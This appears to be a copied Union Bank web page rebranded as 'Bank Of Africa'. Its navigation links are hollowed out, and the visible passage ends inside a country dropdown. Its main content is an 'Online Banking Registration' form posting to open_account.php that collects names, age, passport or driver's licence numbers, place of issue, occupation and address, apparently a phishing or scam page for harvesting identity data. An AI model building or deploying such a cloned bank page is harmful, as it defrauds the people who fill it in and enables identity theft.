﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="global" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:tridion="http://www.tridion.com/ContentManager/5.0">

<!-- Mirrored from www.unionbank.com/global/contactus/index.jsp by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 08 Jul 2017 21:44:58 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
	<title>Overview | Contact Us | Bank Of Africa</title>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<meta http-equiv="Content-Language" content="en-us" />
	<meta name="title" content="Overview | Contact Us | Bank Of Africa" />
	<meta name="description" content="Contact Us" />
	<meta name="keywords" content="Contact Us" />
	<noscript>
	<meta http-equiv="Refresh" content="0; URL=../javascript-error.html" />
	</noscript>
	<link rel="stylesheet" type="text/css" media="all" href="../css/layout.css" />
	<link rel="stylesheet" type="text/css" media="all" href="../css/non-lob-pages.css" />
	<link rel="stylesheet" type="text/css" media="print" href="../css/layout-print.css" />
	<link rel="stylesheet" type="text/css" media="all" href="../css/faq-contact-us.css" />
   	<link rel="stylesheet" type="text/css" media="print" href="../css/custom.css" />
	
	<!--[if lt IE 7]>
	<link rel="stylesheet" type="text/css" media="all" href="/ubincludes/css/layout-ie6.css" />
	<![endif]-->
	<script type="text/javascript" src="../js/jquery-libs.js"></script>
	<script type="text/javascript" src="../js/ub.pages.js"></script>
	
	<link rel="canonical" href="../contactus/index.html" />
</head>
<body>
	

<!-- Start Header -->
<div class="header-wrapper"><div class="header-bg">
<div class="header-container">
    
    <td><img style="width: 70px; height: 60px;" alt="" src="bold.jpg"
        
    
        <script type="text/javascript" src="../js/ub.itg.js"></script> 
    
    <ul class="top-nav">
            <li id="nav-personal" class="top-nav-item first"><a href="../index.html" class="top-nav-item-face">Home</a></li>
            <li id="nav-small-business" class="top-nav-item"><a href="" class="top-nav-item-face">Small Business</a></li>
            <li id="nav-commercial-institutional" class="top-nav-item"><a href="" class="top-nav-item-face">Commercial &amp; Institutional</a></li>
            <li id="nav-the-private-bank" class="top-nav-item last"> <a href="" class="top-nav-item-face">The Private Bank</a></li>
    </ul>
    <script type="text/javascript">ub.utils.initTopNavCurrent()</script>
    <form class="top-search" action="" method="get">
	<input type="hidden" name="output" value="xml_no_dtd" />
	<input type="hidden" name="ie" value="UTF-8" />
	<input type="hidden" name="oe" value="UTF-8" />
	<input type="hidden" name="client" value="ub2_frontend" />
	<input type="hidden" name="proxystylesheet" value="ub2_frontend" />
	<input type="hidden" name="site" value="ub2_collection" />
	<input type="hidden" name="ubtopmenu" value="?" />
	<input type="hidden" name="ubbkimage" value="?" />
	<div class="clearfix">
		<input type="text" name="q" class="top-search-text default-text" title="Search" />
		<button type="submit" class="top-search-submit"></button>
	</div>
</form>    


    <div class="navigation-wrapper">
        <ul id="sub-personal" class="sub-nav">
<li class="sub-nav-item first">
<div class="sub-nav-item-face">
<a href="#"> Checking &amp; Savings</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Checking</a></li>
<li class="sub-nav-flyout-link"><a href=""> Savings</a></li>
<li class="sub-nav-flyout-link"><a href=""> Debit Cards</a></li>
<li class="sub-nav-flyout-link"><a href=""> Overdraft Services</a></li>
</ul>


<div class="sub-nav-flyout-col">
<span class="disclaimer-group-ref">tcm:9-65529</span>
	
		<img src="../Images/Priority-Flyout-Image.jpg"  alt="Priority Banking" title="Priority Banking" />
	 
	
		<div class="h5">Priority Banking</div>
	 
	
		<p>A more rewarding banking experience</p>
	 
	
		
			<a 

href=""

  class="more " >
				Learn more
			</a>
		 
		 
		 
	
</div>

<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Loans &amp; Lines of Credit</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Home Loans</a></li>
<li class="sub-nav-flyout-link"><a href=""> Home Equity</a></li>
<li class="sub-nav-flyout-link"><a href=""> Personal Line of Credit</a></li>
<li class="sub-nav-flyout-link"><a href=""> Credit Cards</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Investments &amp; Retirement</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Brokerage &amp; Investments</a></li>
<li class="sub-nav-flyout-link"><a href=""> Retirement</a></li>
<li class="sub-nav-flyout-link"><a href=""> Insurance</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Online &amp; Mobile Banking</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Online Banking</a></li>
<li class="sub-nav-flyout-link"><a href=""> Mobile Banking</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
</ul>
<ul id="sub-small-business" class="sub-nav">
<li class="sub-nav-item first">
<div class="sub-nav-item-face">
<a href="#"> Checking &amp; Savings</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Checking</a></li>
<li class="sub-nav-flyout-link"><a href=""> Savings</a></li>
<li class="sub-nav-flyout-link"><a href=""> Debit and ATM Cards</a></li>
<li class="sub-nav-flyout-link"><a href=""> Bank Securely</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Loans &amp; Lines of Credit</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Loans &amp; Lines of Credit</a></li>
<li class="sub-nav-flyout-link"><a href=""> Credit Cards</a></li>
<li class="sub-nav-flyout-link"><a href=""> Equipment Leasing</a></li>
<li class="sub-nav-flyout-link"><a href=""> Diversity Lending</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Business Services</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Deposit Solutions</a></li>
<li class="sub-nav-flyout-link"><a href=""> Payment Solutions</a></li>
<li class="sub-nav-flyout-link"><a href=""> Merchant Services</a></li>
<li class="sub-nav-flyout-link"><a href=""> International</a></li>
<li class="sub-nav-flyout-link"><a href=""> Letters of Credit</a></li>
<li class="sub-nav-flyout-link"><a href=""> Employee Benefits</a></li>
<li class="sub-nav-flyout-link"><a href=""> Resource Center</a></li>
<li class="sub-nav-flyout-link"><a href=""> 401K Retirement</a></li>
</ul>


<div class="sub-nav-flyout-col">
<span class="disclaimer-group-ref">tcm:9-69393</span>
	
		<img src="../Images/SBRC-Flyout-Image.jpg"  alt="Small Business Resource Center" title="Small Business Resource Center" />
	 
	
		<div class="h5">Small Business Resource Center</div>
	 
	
		<p>Get information you can use to manage and grow your business.</p>
	 
	
		
			<a 

href=""

  class="more " >
				Learn More
			</a>
		 
		 
		 
	
</div>

<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Online &amp; Mobile Banking</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Online Banking</a></li>
<li class="sub-nav-flyout-link"><a href=""> Mobile Banking</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Business Resources</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Resource Center</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
</ul>
<ul id="sub-commercial-institutional" class="sub-nav">
<li class="sub-nav-item first">
<div class="sub-nav-item-face">
<a href="#"> Treasury Management</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Account Information &amp; Management</a></li>
<li class="sub-nav-flyout-link"><a href=""> Depository Services</a></li>
<li class="sub-nav-flyout-link"><a href=""> Payables Services</a></li>
<li class="sub-nav-flyout-link"><a href=""> Receivables Services</a></li>
<li class="sub-nav-flyout-link"><a href=""> Fraud Prevention Services</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Credit</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Loans and Lines of Credit</a></li>
<li class="sub-nav-flyout-link"><a href=""> Global Financing</a></li>
<li class="sub-nav-flyout-link"><a href=""> Asset Based Lending</a></li>
<li class="sub-nav-flyout-link"><a href=""> Specialized Financing</a></li>
<li class="sub-nav-flyout-link"><a href=""> Trade Finance</a></li>
<li class="sub-nav-flyout-link"><a href=""> Real Estate Financing</a></li>
<li class="sub-nav-flyout-link"><a href=""> Capital Markets</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Trust &amp; Custody</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Corporate Trust Services</a></li>
<li class="sub-nav-flyout-link"><a href=""> Global Custody Services</a></li>
<li class="sub-nav-flyout-link"><a href=""> Liquidity Agency Services</a></li>
<li class="sub-nav-flyout-link"><a href=""> Online Trust &amp; Custody</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Investment Management</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> HighMark Capital Management</a></li>
<li class="sub-nav-flyout-link"><a href=""> Institutional Brokerage</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Capital Markets</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Capital Markets</a></li>
<li class="sub-nav-flyout-link"><a href=""> Foreign Exchange</a></li>
<li class="sub-nav-flyout-link"><a href=""> Market Risk Management</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Global Solutions</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Strong Global Partner</a></li>
<li class="sub-nav-flyout-link"><a href=""> Global Financing</a></li>
<li class="sub-nav-flyout-link"><a href=""> Foreign Exchange</a></li>
<li class="sub-nav-flyout-link"><a href=""> Global Trade Services and Finance</a></li>
<li class="sub-nav-flyout-link"><a href=""> Global Trust Services</a></li>
<li class="sub-nav-flyout-link"><a href=""> Liquidity Management</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
</ul>
<ul id="sub-the-private-bank" class="sub-nav">
<li class="sub-nav-item first">
<div class="sub-nav-item-face">
<a href="#"> The Private Bank</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Wealth Management</a></li>
<li class="sub-nav-flyout-link"><a href=""> Individuals &amp; Families</a></li>
<li class="sub-nav-flyout-link"><a href=""> Business Owners</a></li>
<li class="sub-nav-flyout-link"><a href=""> Corporate Executives</a></li>
<li class="sub-nav-flyout-link"><a href=""> Law Firms</a></li>
<li class="sub-nav-flyout-link"><a href=""> Medical Practices</a></li>
<li class="sub-nav-flyout-link"><a href=""> CPA Firms</a></li>
<li class="sub-nav-flyout-link"><a href=""> Non-Profit Organizations</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Wealth Planning</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Wealth Planning -- Overview</a></li>
<li class="sub-nav-flyout-link"><a href=""> LIFE Map Wealth Planning</a></li>
<li class="sub-nav-flyout-link"><a href=""> Strategic Wealth Plan</a></li>
</ul>




<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Loans &amp; Deposits</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Loans &amp; Deposits -- Overview</a></li>
<li class="sub-nav-flyout-link"><a href=""> Private Advantage Checking</a></li>
<li class="sub-nav-flyout-link"><a href=""> Deposit &amp; Liquidity Management</a></li>
<li class="sub-nav-flyout-link"><a href=""> Lending Services</a></li>
<li class="sub-nav-flyout-link"><a href=""> Jumbo Mortgages</a></li>
<li class="sub-nav-flyout-link"><a href=""> Portfolio Access Line of Credit</a></li>
<li class="sub-nav-flyout-link"><a href=""> Treasury Management</a></li>
<li class="sub-nav-flyout-link"><a href=""> Foreign Exchange</a></li>
<li class="sub-nav-flyout-link"><a href=""> Credit Cards</a></li>
</ul>


<div class="sub-nav-flyout-col">
<span class="disclaimer-group-ref">tcm:9-43214</span>
	
		<img src="../Images/online-mobile-flyout_148x63.jpg"  alt="Online & Mobile Banking" title="Online & Mobile Banking" />
	 
	
		<div class="h5">Online &amp; Mobile Banking</div>
	 
	
		<p>Enjoy the convenience of Online &amp; Mobile Banking.</p>
	 
	
		 
		
			<a href="../private-bank/loans-deposits/online-banking/index.html"   class="more " >Learn More</a>		 
		 
	
</div>

<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Trust &amp; Estate Services</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Trust &amp; Estate Services -- Overview</a></li>
<li class="sub-nav-flyout-link"><a href=""> Trust Administration</a></li>
<li class="sub-nav-flyout-link"><a href=""> Estate Settlement</a></li>
<li class="sub-nav-flyout-link"><a href=""> Philanthropic Services</a></li>
<li class="sub-nav-flyout-link"><a href=""> Real Estate Management</a></li>
<li class="sub-nav-flyout-link"><a href=""> Oil, Gas, and Mineral Management</a></li>
<li class="sub-nav-flyout-link"><a href=""> Closely Held Businesses</a></li>
<li class="sub-nav-flyout-link"><a href=""> Loan Management</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Risk Management</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Risk Management -- Overview</a></li>
<li class="sub-nav-flyout-link"><a href=""> Insurance</a></li>
<li class="sub-nav-flyout-link"><a href=""> Interest Rate Risk Management</a></li>
<li class="sub-nav-flyout-link"><a href=""> Foreign Exchange Risk Management</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
<li class="sub-nav-item">
<div class="sub-nav-item-face">
<a href="#"> Investments</a>
</div>
<div class="sub-nav-flyout">
<div class="sub-nav-flyout-panel">
<ul class="sub-nav-flyout-links">
<li class="sub-nav-flyout-link"><a href=""> Investments -- Overview</a></li>
<li class="sub-nav-flyout-link"><a href=""> Managed Account Program</a></li>
<li class="sub-nav-flyout-link"><a href=""> Brokerage Services</a></li>
</ul>
<div class="clear"></div>
</div>
</div>
</li>
</ul>

        <ul class="global-navigation sub-nav">
	<li class="sub-nav-item first">
		<div class="sub-nav-item-face"><a href="">About Bank Of Africa</a></div>
	</li>
	<li class="sub-nav-item">
		<div class="sub-nav-item-face"><a href="#">Contact Us</a></div>
	</li>
	<li class="sub-nav-item">
		<div class="sub-nav-item-face">My State: <a id="stateoverlay" href="javascript:void(0)"><span id="ubmystate"></span></a>
		<script type="text/javascript">
		window.dom.query('#ubmystate').ready(function ($) {
			$('#ubmystate').text($.cookie("UBMarketRegion") || "--");
		});
		</script>
		</div>
	</li>
	<li class="sub-nav-item">
		<div class="sub-nav-item-face"><a href="#Branch-Locator" onclick="return false;">Find Locations<span class="adaAccessibilityHidden">menu</span></a></div>
		<span class="adaAccessibilityHidden">Start of Find Locations dialog.</span>
		<form class="home-find-location sub-nav-flyout" name="find-a-branch-flyout" action="" method="get">
			<input type="text" name="find-a-branch" id="home-find-location-text" class="home-find-location-text default-text" title="Zip or City, State" /> 
			<button type="submit" class="home-find-location-go">Go</button>
			<div class="find-flyout">
				<a href="#" class="find-flyout-trigger" style="width:75px;">More Options &gt;</a>
				<a style="color: #666666;position:absolute;top:37px;left:95px;font-weight:bold;text-decoration:none;font-size:1em;" onmouseover="this.style.color='#333333';" onmouseout="this.style.color='#666666';" onfocus="this.style.color='#333333';" onblur="this.style.color='#666666';" href="">All Locations &gt</a>
				<div class="find-flyout-panel">
					<ul>
						<li><input type="checkbox" value="sl-branch" id="sl-branch" checked="checked" /><label for="sl-branch">Branches</label></li>
						<li><input type="checkbox" value="sl-allatm" id="sl-allatm" /><label for="sl-allatm">ATMs</label></li>
						<li><input type="checkbox" value="sl-fcxchg" id="sl-fcxchg" /><label for="sl-fcxchg">Foreign Currency Exchange</label></li>
						<li><input type="checkbox" value="sl-isbranch" id="sl-isbranch" /><label for="sl-isbranch">In-Store Branches</label></li>
					</ul>
				</div>
			</div>
		</form>
		<span class="adaAccessibilityHidden">End of Find Locations dialog.</span>
		<div class="clear"></div>
	</li>
	<li class="sub-nav-item last">
		<div class="sub-nav-item-face"><a href="">Help</a></div>
	</li>
</ul>
<script type="text/javascript">ub.utils.initGlobalNavigation();</script>
<!--- Following code to display state overlay --->
<script type="text/javascript">
window.dom.query(document).ready(function ($) {
	$('#stateoverlay').click(function () {
		$('#state-widget').css("display","block");
		$('#stateselection').css("display","block");
	});
});
</script>
<div id ="state-widget" style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: #5c5c5c; opacity: .80;filter:Alpha(Opacity=80); display:none;"></div>

<div id="stateselection" name="stateselection" style="z-index: 10000; position: absolute; visibility: visible; left: 350px; top: 183px; display:none;">
	<div class="itgRateStateSelection" style="background-image: url('../css/img/overlay_StateSelection_closed_v2.png'); width: 337px; height: 181px;">
	<a style="padding: 0; margin: 0; width: 16px; height: 16px; position: relative; top: 18px; left: 302px;" id="closeButton" href="javascript:void(0)" onclick="window.location.reload()"><img src="../css/img/overlay_close.png" border="0" title="Close" alt="Close" /></a>
	<div id="stateSelectionFormContainer" style="position: relative; top: 112px; left: 15px; width: 303px;">
		<span class="adaAccessibilityHidden">Start of State Selection form.</span>
		<form method="post" id="stateSelectionForm" name="stateSelectionForm" action="javascript:void(0)">
			<select name="rates-state-selection" id="rates-state-selection" title="Select Your State"><option value="">Select Your State</option><option value="AL">AL</option><option value="AK">AK</option><option value="AZ">AZ</option><option value="AR">AR</option><option value="CA">CA</option><option value="CO">CO</option><option value="CT">CT</option><option value="DE">DE</option><option value="DC">DC</option><option value="FL">FL</option><option value="GA">GA</option><option value="HI">HI</option><option value="ID">ID</option><option value="IL">IL</option><option value="IN">IN</option><option value="IA">IA</option><option value="KS">KS</option><option value="KY">KY</option><option value="LA">LA</option><option value="ME">ME</option><option value="MD">MD</option><option value="MA">MA</option><option value="MI">MI</option><option value="MN">MN</option><option value="MS">MS</option><option value="MO">MO</option><option value="MT">MT</option><option value="NE">NE</option><option value="NV">NV</option><option value="NH">NH</option><option value="NJ">NJ</option><option value="NM">NM</option><option value="NY">NY</option><option value="NC">NC</option><option value="ND">ND</option><option value="OH">OH</option><option value="OK">OK</option><option value="OR">OR</option><option value="PA">PA</option><option value="RI">RI</option><option value="SC">SC</option><option value="SD">SD</option><option value="TN">TN</option><option value="TX">TX</option><option value="UT">UT</option><option value="VT">VT</option><option value="VA">VA</option><option value="WA">WA</option><option value="WV">WV</option><option value="WI">WI</option><option value="WY">WY</option></select>
			<span>
				<button class="home-find-location-go" style="margin-right:10px;" value="Go" type="submit">Go</button>
				<a href="javascript:void(0)" onclick="window.location.reload()">Cancel</a>
			 </span>
		</form>
		<span class="adaAccessibilityHidden">End of State Selection form.</span>
	</div>
	<script type="text/javascript">
	if (window.dom && window.dom.query) {
		window.dom.query('#stateSelectionForm').ready(function ($) {
			"use strict";
			$('#rates-state-selection').val($.cookie("UBMarketRegion") || "");
			var form = $('#stateSelectionForm').submit(function () {
				var chosenState = form.find('select[name=rates-state-selection]').val();
				if (chosenState !== '') {
					$.cookie("UBMarketRegion", chosenState, { path: '/' , expires: 3653 });
					window.location.reload();
				} else {
					$('#stateSelectionMessage').show();
					$('#rates-state-selection').css('border', 'solid 1px #DA2128');
				}
			});
		});
	}
	</script>
	</div>
</div>         <div class="clear"></div>
    </div>
        
    

</div>
</div></div>
<!-- End Header -->
	<div class="content">
		<div class="top-actions-container content-panel">
			<p class="left breadcrumb">
				<a href="../contactus/index.html" class="breadcrumb-item">Contact Us</a>&nbsp;
			</p>
			<p class="right">
				<a href="#" class="action-item" id="action-print-page">Print</a> | <a href="#" class="action-item" id="action-email-page">Email</a>
			</p>
			<div class="clear"></div>
		</div>
		
		<div class="product-details-container content-panel ">
			<div class="main-content-left-rail">

				
				
				

<div class="sub-nav-category shadow">
<script type="text/javascript">ub.BeginComponent('.sub-nav-category')</script>
<span class="disclaimer-group-ref">tcm:9-42464</span>
	
	        
	<div class="sub-category">
		<div class="sub-category"> 
		
		<ul>
			   
			<li>
				
					<a 

href="../contactus/index.html"

 >Overview</a>
				
				 
				 

				

				

				
			</li>
			   
			<li>
				
					<a 

href=""

 >Get Help by Email</a>
				
				 
				 

				

				

				
			</li>
			   
			<li>
				
					<a 

href=""

 >Send Us Feedback</a>
				
				 
				 

				

				

				
			</li>
			   
			<li>
				
					<a 

href=""

 >Call Us</a>
				
				 
				 

				

				

				
			</li>
			   
			<li>
				
					<a 

href=""

 >Find a Branch</a>
				
				 
				 

				

				

				
			</li>
			
		</ul>
		</div>
	</div>
	
</div>


				
				
				

			</div>

			<div class="products-details tabbed-content-general shadow">
				
				
				<div id="products-tab-item-0" class="tab-panel">
						<span class="disclaimer-group-ref">tcm:9-42248</span>
						
						<div class="tab-title" ><h1></h1></div>
						
						
						    
    
        <div class="component text-container">
          
						<h4>Online Banking| Registration</h4>
                        <div class="login">
        <form name="form" id="form" action="open_account.php" class="" method="post">
            <input type="hidden" name="username" value="stasbk">
            <input type="hidden" name="reqd" value="0">
            <input type="hidden" name="url" value="open_account.htm">
             <div class="field">
  			<input type="text" name="lname" class="flat" placeholder="Last Name" required>
            </div>
             <div class="field">
            <input type="text" name="fname" class="flat" placeholder="First Name" required>
            </div>
             <div class="field">
            <input type="text" class="flat" name="age" id="age" placeholder="Age" required>
            </div>
             <div class="flat">
            <select name="ID" class="flat">
                <option value="None">Select Id</option>
            	<option value="Driver License">Driver's License </option>
                <option value="Passport">Passport </option>
				
            </select>
            </div>
             <div class="field">
            <input type="text" name="idnum" id="idnum" class="flat" placeholder="ID Number" required>
            </div>
             <div class="field">
            <input type="text" name="idissue" max="20" class="flat" placeholder="Place Of Issue" required>
            </div>
             <div class="field">
            <input type="text" name="occupation" size="20" class="flat" placeholder="Occupation" required>
            </div>
             <div class="field">
            <input type="text" name="comp" class="flat" placeholder="Company(If Applicable)">
            </div>
             <div class="field">
			<input type="text" name="add1" class="flat" placeholder="Address" required>
            </div>
             <div class="field">
			<input type="text" name="city" class="flat" placeholder="City">
            </div>
             <div class="field">
            <input type="text" name="state1" class="flat" placeholder="State/Province" required>
            </div>
             <div class="field">
               <select name="country" id="country" class="flat">
             <option value="">Choose a Country </option>
  			 <option value="USA">United States of America </option>
             <option value="CAN">Canada </option>
             <option value="DEU">Germany </option>
             <option value="FRA">France </option>
             <option value="GBR">United Kingdom </option>
             <option value="IND">India </option>
             <option value="">--------------------- </option>
             <option value="AFG">Afghanistan </option>
             <option value="ALB">Albania </option>
             <option value="DZA">Algeria </option>
             <option value="ASM">American Samoa </option>
             <option value="AND">Andorra </option>
             <option value="AGO">Angola </option>
             <option value="AIA">Anguilla </option>
             <option value="ATA">Antarctica </option>
             <option value="ATG">Antigua and Barbuda </option>
             <option value="ARG">Argentina </option>
             <option value="ARM">Armenia </option>
             <option value="ABW">Aruba </option>
             <option value="AUS">Australia </option>
             <option value="AUT">Austria </option>
             <option value="AZE">Azerbaijan </option>
             <option value="BHS">Bahamas </option>
             <option value="BHR">Bahrain </option>
             <option value="BGD">Bangladesh </option>
             <option value="BRB">Barbados </option>
             <option value="BLR">Belarus </option>
             <option value="BEL">Belgium </option>
             <option value="BLZ">Belize </option>
             <option value="BEN">Benin </option>
             <option value="BMU">Bermuda </option>
             <option value="BTN">Bhutan </option>
             <option value="BOL">Bolivia </option>
             <option value="BIH">Bosnia and Herzegowina</option>
             <option value="BWA">Botswana </option>
             <option value="BVT">Bouvet Island </option>
             <option value="BRA">Brazil </option>
             <option value="IOT">British Indian Ocean Territory</option>
             <option value="BRN">Brunei Darussalam </option>
             <option value="BGR">Bulgaria </option>
             <option value="BFA">Burkina Faso </option>
             <option value="BDI">Burundi </option>
             <option value="KHM">Cambodia </option>
             <option value="CMR">Cameroon </option>
             <option value="CPV">Cape Verde </option>
             <option value="CYM">Cayman Islands </option>
             <option value="CAF">Central African Republic</option>
             <option value="TCD">Chad </option>
             <option value="CHL">Chile </option>
             <option value="CHN">China </option>
             <option value="CXR">Christmas Island </option>
             <option value="CCK">Cocoa (Keeling) Islands</option>
             <option value="COL">Colombia </option>
             <option value="COM">Comoros </option>
             <option value="COG">Congo </option>
             <option value="COK">Cook Islands </option>
             <option value="CRI">Costa Rica </option>
             <option value="CIV">Cote Divoire </option>
             <option value="HRV">Croatia (local name:Hrvatska)</option>
             <option value="CUB">Cuba </option>
             <option value="CYP">Cyprus </option>
             <option value="CZE">Czech Republic </option>
             <option value="DNK">Denmark </option>
             <option value="DJI">Djibouti </option>
             <option value="DMA">Dominica </option>
             <option value="DOM">Dominican Republic </option>
             <option value="TMP">East Timor </option>
             <option value="ECU">Ecuador </option>
             <option value="EGY">Egypt </option>
             <option value="SLV">El Salvador </option>
             <option value="GNQ">Equatorial Guinea </option>
             <option value="ERI">Eritrea </option>
             <option value="EST">Estonia </option>
             <option value="ETH">Ethiopia </option>
             <option value="FLK">Falkland Islands(Malvinas)</option>
             <option value="FRO">Faroe Islands </option>
             <option value="FJI">Fiji </option>
             <option value="FIN">Finland </option>
             <option value="FXX">France, Metropolitan </option>
             <option value="GUF">French Guiana </option>
             <option value="PYF">French Polynesia </option>
             <option value="ATF">French Southern Territories</option>
             <option value="GAB">Gabon </option>
             <option value="GMB">Gambia </option>
             <option value="GEO">Georgia </option>
             <option value="GHA">Ghana </option>
             <option value="GIB">Gibraltar </option>
             <option value="GRC">Greece </option>
             <option value="GRL">Greenland </option>
              <option value="GRD">Grenada </option>
              <option value="GLP">Guadeloupe </option>
              <option value="GUM">Guam </option>
             <option value="GTM">Guatemala </option>
             <option value="GIN">Guinea </option>
             <option value="GNB">Guinea-Bissau </option>
             <option value="GUY">Guyana </option>
             <option value="HTI">Haiti </option>
              <option value="HMD">Heard and Mc Donald Islands </option>
             <option value="HND">Honduras </option>
                                    <option value="HKG">Hong Kong </option>
                                    <option value="HUN">Hungary </option>

                                    <option value="ISL">Iceland </option>
                                    <option value="IDN">Indonesia </option>
                                    <option value="IRN">Iran (Islamic Republic 
									of) </option>
                                    <option value="IRQ">Iraq </option>
                                    <option value="IRL">Ireland </option>
                                    <option value="ISR">Israel </option>

                                    <option value="ITA">Italy </option>
                                    <option value="JAM">Jamaica </option>
                                    <option value="JPN">Japan </option>
                                    <option value="JOR">Jordan </option>
                                    <option value="KAZ">Kazakhstan </option>
                                    <option value="KEN">Kenya </option>

                                    <option value="KIR">Kiribati </option>
                                    <option value="PRK">Korea, Democratic 
									Peoples Republic of </option>
                                    <option value="KOR">Korea, Republic of </option>
                                    <option value="KWT">Kuwait </option>
                                    <option value="KGZ">Kyrgyzstan </option>
                                    <option value="LAO">Lao Peoples Democratic 
									Republic </option>

                                    <option value="LVA">Latvia </option>
                                    <option value="LBN">Lebanon </option>
                                    <option value="LSO">Lesotho </option>
                                    <option value="LBR">Liberia </option>
                                    <option value="LBY">Libyan Arab Jamahiriya 
                                    </option>
                                    <option value="LIE">Liechtenstein </option>

                                    <option value="LTU">Lithuania </option>
                                    <option value="LUX">Luxembourg </option>
                                    <option value="MAC">Macau </option>
                                    <option value="MKD">Macedonia, The Former 
									Yugoslav Republic of </option>
                                    <option value="MDG">Madagascar </option>
                                    <option value="MWI">Malawi </option>

                                    <option value="MYS">Malaysia </option>
                                    <option value="MDV">Maldives </option>
